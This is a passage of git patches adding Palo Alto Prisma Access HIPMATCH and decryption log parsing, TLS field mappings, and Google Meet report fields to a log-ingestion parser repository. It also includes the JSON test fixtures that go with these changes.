+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
@@ -382,6 +382,49 @@ pipeline:
           - HighResolutionTimestamp
         delimiter: ","
 
+  # HIPMATCH CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'HIPMATCH'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - PaloAltoDomain
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - ConfigVersion
+          - GenerateTime
+          - SourceUser
+          - VirtualLocation
+          - MachineName
+          - EndpointOSType
+          - SourceAddress
+          - HipMatchName
+          - RepeatCount
+          - HIPMatchType
+          - FUTURE_USE
+          - FUTURE_USE
+          - SequenceNumber
+          - ActionFlags
+          - DGHierarchyLevel1
+          - DGHierarchyLevel2
+          - DGHierarchyLevel3
+          - DGHierarchyLevel4
+          - VirtualSystemName
+          - DeviceName
+          - VirtualSystemID
+          - SourceIPv6
+          - HostID
+          - EndpointSerialNumber
+          - SourceDeviceMac
+          - HighResolutionTimestamp
+          - ClusterName
+        delimiter: ","
+
   - name: parsed_timestamp
     external:
       name: date.parse
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json
new file mode 100644
index 000000000..140e7657e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_hipmatch_csv.json	
@@ -0,0 +1,73 @@
+{
+  "input": {
+    "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto Prisma access",
+        "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630"
+      }
+    }
+  },
+  "expected": {
+    "message": "1,2024/11/03 18:50:04,026701003578,HIPMATCH,0,2817,2024/11/03 18:50:04,jdoe,vsys1,DESKTOP-01,Windows,1.2.3.4,VPN Compliant,1,profile,,,1111111111111111111,0x8000000000000000,28,99,38,0,,FW-CIV1,1,0.0.0.0,3a7393a4-997f-4e5b-b6e4-4ebff71dacf4,aefee8,,2024-11-03T18:50:04.310+01:00,\n",
+    "event": {
+      "category": [
+        "network"
+      ],
+      "dataset": "hipmatch",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-03T17:50:04.310000Z",
+    "action": {
+      "type": "0"
+    },
+    "host": {
+      "id": "3a7393a4-997f-4e5b-b6e4-4ebff71dacf4",
+      "name": "DESKTOP-01"
+    },
+    "log": {
+      "hostname": "FW-CIV1",
+      "logger": "hipmatch"
+    },
+    "observer": {
+      "name": "FW-CIV1",
+      "product": "PAN-OS",
+      "serial_number": "026701003578"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "28",
+      "DGHierarchyLevel2": "99",
+      "DGHierarchyLevel3": "38",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
+      "endpoint": {
+        "serial_number": "aefee8"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "VPN Compliant"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "user": {
+        "name": "jdoe"
+      }
+    },
+    "user": {
+      "name": "jdoe"
+    }
+  }
+}
\ No newline at end of file

From f35315945b88ff7a1085f7d2e531cac1196f78d8 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:55:42 +0100
Subject: [PATCH 275/317] fix(PaloAlto): improve support for decryption events

---
 .../paloalto-prisma-access/_meta/fields.yml   |  15 +++
 .../paloalto-prisma-access/ingest/parser.yml  |  10 ++
 .../tests/test_decryption_json.json           | 119 ++++++++++++++++++
 3 files changed, 144 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json

diff --git a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml
index 6382be28b..3b3fd8fc6 100644
--- a/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml	
+++ b/Palo Alto Networks/paloalto-prisma-access/_meta/fields.yml	
@@ -297,3 +297,18 @@ paloalto.threat.name:
   description: The name of the threat
   name: paloalto.threat.name
   type: keyword
+
+paloalto.tls.chain_status:
+  description: The trust in the TLS chain
+  name: paloalto.tls.chain_status
+  type: keyword
+
+paloalto.tls.root_status:
+  description: The trust in the root certificate
+  name: paloalto.tls.root_status
+  type: keyword
+
+paloalto.tls.sni:
+  description: The server name indication
+  name: paloalto.tls.sni
+  type: keyword
diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 63f72e8e0..8da957210 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
@@ -636,6 +636,13 @@ stages:
           network.transport: "{{parsed_event.message.IPProtocol or parsed_event.message.proto}}"
           network.protocol: "{{parsed_description.message.proto}}"
           network.type: "{{parsed_event.message.TunnelType or parsed_event.message.PanOSTunnelType}}"
+          tls.version: "{{parsed_event.message.TLSVersion[3:]}}"
+          tls.cipher: "TLS_{{parsed_event.message.TLSKeyExchange}}_{{parsed_event.message.TLSEncryptionAlgorithm}}_{{parsed_event.message.message.TLS_AUTH}}"
+          tls.curve: "{{parsed_event.message.EllipticCurve}}"
+          tls.server.x509.issuer.common_name: "{{parsed_event.message.IssuerCommonName}}"
+          tls.server.x509.subject.common_name: "{{parsed_event.message.SubjectCommonName}}"
+          tls.server.x509.serial_number: "{{parsed_event.message.CertificateSerialNumber}}"
+          tls.server.hash.sha256: "{{parsed_event.message.Fingerprint}}"
           observer.egress.interface.alias: "{{parsed_event.message.ToZone or parsed_event.message.cs5}}"
           observer.ingress.interface.alias: "{{parsed_event.message.FromZone or parsed_event.message.cs4}}"
           observer.ingress.interface.name: "{{parsed_description.message.intf}}"
@@ -809,6 +816,9 @@ stages:
           paloalto.endpoint.serial_number: "{{parsed_event.message.EndpointSerialNumber or parsed_event.message.PanOSEndpointSerialNumber}}"
           paloalto.threat.id: "{{parsed_event.message.ThreatID or parsed_event.message.PanOSThreatID or parsed_threat.message.threat_code}}"
           paloalto.threat.name: "{{parsed_threat.message.threat_description}}"
+          paloalto.tls.chain_status: "{{parsed_event.message.ChainStatus}}"
+          paloalto.tls.root_status: "{{parsed_event.message.RootStatus}}"
+          paloalto.tls.sni: "{{parsed_event.message.ServerNameIndication}}"
       - set:
           source.user.name: "{{parsed_event.message.SourceUser}}"
           user.name: "{{parsed_event.message.SourceUser}}"
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json
new file mode 100644
index 000000000..35fa4abec
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_json.json	
@@ -0,0 +1,119 @@
+{
+  "input": {
+    "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto Prisma access",
+        "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630"
+      }
+    }
+  },
+  "expected": {
+    "message": "{\"TimeReceived\":\"2024-11-20T16:40:01.000000Z\",\"DeviceSN\":\"no-serial\",\"LogType\":\"DECRYPTION\",\"Subtype\":\"start\",\"SubType\":\"start\",\"ConfigVersion\":\"10.2\",\"TimeGenerated\":\"2024-11-20T16:39:51.000000Z\",\"SourceAddress\":\"1.2.3.4\",\"DestinationAddress\":\"5.6.7.8\",\"NATSource\":\"4.3.2.1\",\"NATDestination\":\"8.7.6.5\",\"Rule\":\"URL Filtering - Chrome Profile\",\"SourceUser\":\"example\\\\jdoe\",\"DestinationUser\":null,\"Application\":\"incomplete\",\"VirtualLocation\":\"vsys1\",\"FromZone\":\"VPN-SSL\",\"ToZone\":\"INTERNET\",\"InboundInterface\":\"tunnel.16\",\"OutboundInterface\":\"ethernet1/1\",\"LogSetting\":\"Forward-Syslog\",\"TimeReceivedManagementPlane\":\"2024-11-20T16:39:51.000000Z\",\"SessionID\":2222222,\"RepeatCount\":1,\"CountOfRepeat\":1,\"SourcePort\":58877,\"DestinationPort\":443,\"NATSourcePort\":1042,\"NATDestinationPort\":443,\"Protocol\":\"tcp\",\"Action\":\"allow\",\"Tunnel\":\"N/A\",\"SourceUUID\":null,\"DestinationUUID\":null,\"RuleUUID\":\"eaf45b26-01ef-496c-990d-bbd1d89f2ed5\",\"ClientToFirewall\":\"Finished\",\"FirewallToClient\":\"Client_Hello\",\"TLSVersion\":\"TLS1.2\",\"TLSKeyExchange\":\"ECDHE\",\"TLSEncryptionAlgorithm\":\"AES_256_GCM\",\"TLSAuth\":\"SHA384\",\"PolicyName\":\"TLS - https inspection - default rule\",\"EllipticCurve\":\"secp256r1\",\"ErrorIndex\":\"Protocol\",\"RootStatus\":\"trusted\",\"ChainStatus\":\"Trusted\",\"ProxyType\":\"Forward\",\"CertificateSerial\":\"059125d73c34a73fca9\",\"Fingerprint\":\"01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b\",\"TimeNotBefore\":1730875569,\"TimeNotAfter\":1765176368,\"CertificateVersion\":\"V3\",\"CertificateSize\":256,\"CommonNameLength\":13,\"IssuerNameLength\":29,\"RootCNLength\":10,\"SNILength\":23,\"CertificateFlags\":4,\"CommonName\":\"example.org\",\"IssuerCommonName\":\"GlobalSign ECC OV SSL CA 2018\",\"RootCommonName\":\"GlobalSign\",\"ServerNameIndication\":\"static.files.example.org\",\"ErrorMessage\":\"General TLS protocol error. Received fatal alert DecodeError from server\",\"ContainerID\":null,\"ContainerNameSpace\":null,\"ContainerName\":null,\"SourceEDL\":null,\"DestinationEDL\":null,\"SourceDynamicAddressGroup\":null,\"DestinationDynamicAddressGroup\":null,\"TimeGeneratedHighResolution\":\"2024-11-20T16:39:51.441000Z\",\"SourceDeviceCategory\":null,\"SourceDeviceProfile\":null,\"SourceDeviceModel\":null,\"SourceDeviceVendor\":null,\"SourceDeviceOSFamily\":null,\"SourceDeviceOSVersion\":null,\"SourceDeviceHost\":null,\"SourceDeviceMac\":null,\"DestinationDeviceCategory\":null,\"DestinationDeviceProfile\":null,\"DestinationDeviceModel\":null,\"DestinationDeviceVendor\":null,\"DestinationDeviceOSFamily\":null,\"DestinationDeviceOSVersion\":null,\"DestinationDeviceHost\":null,\"DestinationDeviceMac\":null,\"SequenceNo\":1111111111111111111}\n",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "decryption",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-20T16:39:51Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "start"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "8.7.6.5",
+        "port": 443
+      },
+      "port": 443
+    },
+    "log": {
+      "logger": "decryption"
+    },
+    "network": {
+      "application": "incomplete"
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "INTERNET"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "VPN-SSL"
+        }
+      },
+      "product": "PAN-OS",
+      "serial_number": "no-serial"
+    },
+    "paloalto": {
+      "Threat_ContentType": "start",
+      "VirtualLocation": "vsys1",
+      "tls": {
+        "chain_status": "Trusted",
+        "root_status": "trusted",
+        "sni": "static.files.example.org"
+      }
+    },
+    "related": {
+      "hash": [
+        "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b"
+      ],
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "8.7.6.5"
+      ],
+      "user": [
+        "example",
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "URL Filtering - Chrome Profile",
+      "uuid": "eaf45b26-01ef-496c-990d-bbd1d89f2ed5"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "4.3.2.1",
+        "port": 1042
+      },
+      "port": 58877,
+      "user": {
+        "domain": "example",
+        "name": "jdoe"
+      }
+    },
+    "tls": {
+      "curve": "secp256r1",
+      "server": {
+        "hash": {
+          "sha256": "01ba4719c80b6fe911b091a7c05124b64eeece964e09c058ef8f9805daca546b"
+        },
+        "x509": {
+          "issuer": {
+            "common_name": "GlobalSign ECC OV SSL CA 2018"
+          }
+        }
+      },
+      "version": "1.2"
+    },
+    "user": {
+      "domain": "jdoe",
+      "name": "example"
+    }
+  }
+}
\ No newline at end of file

From c93a4a974e1e4417b0c7e4496cfc9327ed6b3160 Mon Sep 17 00:00:00 2001
From: Sebastien Quioc <sebastien.quioc@sekoia.fr>
Date: Thu, 21 Nov 2024 17:57:01 +0100
Subject: [PATCH 276/317] fix(PaloAlto): add support for DSV Decryption events

---
 .../paloalto-prisma-access/ingest/parser.yml  | 118 ++++++++++++++++++
 .../tests/test_decryption_csv.json            |  98 +++++++++++++++
 2 files changed, 216 insertions(+)
 create mode 100644 Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json

diff --git a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml
index 8da957210..d212c5fcc 100644
--- a/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
+++ b/Palo Alto Networks/paloalto-prisma-access/ingest/parser.yml	
@@ -425,6 +425,124 @@ pipeline:
           - ClusterName
         delimiter: ","
 
+  # DECRYPTION CSV
+  - name: parsed_event
+    filter: "{{parsed_dsv.message.Type == 'DECRYPTION'}}"
+    external:
+      name: dsv.parse-dsv
+      properties:
+        input_field: original.message
+        output_field: message
+        columnnames:
+          - PaloAltoDomain
+          - ReceiveTime
+          - DeviceSN
+          - Type
+          - Subtype
+          - ConfigVersion
+          - GenerateTime
+          - SourceAddress
+          - DestinationAddress
+          - NATSourceIP
+          - NATDestinationIP
+          - Rule
+          - SourceUser
+          - DestinationUser
+          - Application
+          - VirtualLocation
+          - SourceZone
+          - DestinationZone
+          - InboundInterface
+          - OutboundInterface
+          - LogAction
+          - TimeLogged
+          - SessionID
+          - RepeatCount
+          - SourcePort
+          - DestinationPort
+          - NATSourcePort
+          - NATDestinationPort
+          - Flags
+          - IPProtocol
+          - Action
+          - Tunnel
+          - FUTURE_USE
+          - FUTURE_USE
+          - SourceVMUUID
+          - DestinationVMUUID
+          - UUIDforrule
+          - StageforClienttoFirewall
+          - StageforFirewalltoServer
+          - TLSVersion
+          - TLSKeyExchange
+          - TLSEncryptionAlgorithm
+          - TLS_AUTH
+          - PolicyName
+          - EllipticCurve
+          - ErrorIndex
+          - RootStatus
+          - ChainStatus
+          - ProxyType
+          - CertificateSerialNumber
+          - Fingerprint
+          - CertificateStartDate
+          - CertificateEndDate
+          - CertificateVersion
+          - CertificateSize
+          - CommonNameLength
+          - IssuerCommonNameLength
+          - RootCommonNameLength
+          - SNILength
+          - CertificateFlags
+          - SubjectCommonName
+          - IssuerSubjectCommonName
+          - RootSubjectCommonName
+          - ServerNameIndication
+          - Error
+          - ContainerID
+          - PODNamespace
+          - PODName
+          - SourceExternalDynamicList
+          - DestinationExternalDynamicList
+          - SourceDynamicAddressGroup
+          - DestinationDynamicAddressGroup
+          - HighResTimestamp
+          - SourceDeviceCategory
+          - SourceDeviceProfile
+          - SourceDeviceModel
+          - SourceDeviceVendor
+          - SourceDeviceOSFamily
+          - SourceDeviceOSVersion
+          - SourceHostname
+          - SourceMACAddress
+          - DestinationDeviceCategory
+          - DestinationDeviceProfile
+          - DestinationDeviceModel
+          - DestinationDeviceVendor
+          - DestinationDeviceOSFamily
+          - DestinationDeviceOSVersion
+          - DestinationHostname
+          - DestinationMACAddress
+          - SequenceNumber
+          - ActionFlags
+          - DGHierarchyLevel1
+          - DGHierarchyLevel2
+          - DGHierarchyLevel3
+          - DGHierarchyLevel4
+          - VirtualSystemName
+          - DeviceName
+          - VirtualSystemID
+          - ApplicationSubcategory
+          - ApplicationCategory
+          - ApplicationTechnology
+          - ApplicationRisk
+          - ApplicationCharacteristic
+          - ApplicationContainer
+          - ApplicationSaaS
+          - ApplicationSanctionedState
+          - ClusterName
+        delimiter: ","
+
   - name: parsed_timestamp
     external:
       name: date.parse
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json
new file mode 100644
index 000000000..8a060536e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json	
@@ -0,0 +1,98 @@
+{
+  "input": {
+    "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto Prisma access",
+        "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630"
+      }
+    }
+  },
+  "expected": {
+    "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "decryption",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-11-03T19:09:43Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "0"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "8.7.6.5",
+        "port": 443
+      },
+      "port": 443
+    },
+    "log": {
+      "hostname": "NFW-OUT-DCA",
+      "logger": "decryption"
+    },
+    "network": {
+      "application": "ssl",
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "NFW-OUT-DCA",
+      "product": "PAN-OS",
+      "serial_number": "111111111111"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "53",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "0",
+      "VirtualLocation": "vsys1",
+      "VirtualSystemID": "1",
+      "tls": {
+        "chain_status": "Uninspected",
+        "root_status": "uninspected"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "4.3.2.1",
+        "5.6.7.8",
+        "8.7.6.5"
+      ],
+      "user": [
+        "jdoe"
+      ]
+    },
+    "rule": {
+      "name": "URL Filtering - Chrome Profile"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "4.3.2.1",
+        "port": 22814
+      },
+      "port": 55107,
+      "user": {
+        "name": "jdoe"
+      }
+    },
+    "tls": {
+      "version": "1.3"
+    },
+    "user": {
+      "name": "jdoe"
+    }
+  }
+}
\ No newline at end of file

From 652c3ba67b29328a991970be1b7ea34412123e40 Mon Sep 17 00:00:00 2001
From: LenaigKaliou <lenaigk@protonmail.com>
Date: Fri, 22 Nov 2024 10:33:29 +0100
Subject: [PATCH 277/317] Google Report: add source.ip and user.email

---
 Google Cloud/google-report/ingest/parser.yml  |  2 +
 .../google-report/tests/test_end_call.json    | 59 +++++++++++++++++++
 .../tests/test_end_call_no_ip.json            | 44 ++++++++++++++
 .../tests/test_meet_sample1.json              |  9 ++-
 4 files changed, 113 insertions(+), 1 deletion(-)
 create mode 100644 Google Cloud/google-report/tests/test_end_call.json
 create mode 100644 Google Cloud/google-report/tests/test_end_call_no_ip.json

diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml
index 4213a66c9..a52024ed9 100644
--- a/Google Cloud/google-report/ingest/parser.yml	
+++ b/Google Cloud/google-report/ingest/parser.yml	
@@ -161,6 +161,8 @@ stages:
           network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}'
 
           google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}'
+          user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}'
+          source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}'
 
   set_groups_enterprise_fields:
     actions:
diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json
new file mode 100644
index 000000000..21a51a926
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_end_call.json	
@@ -0,0 +1,59 @@
+{
+  "input": {
+    "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 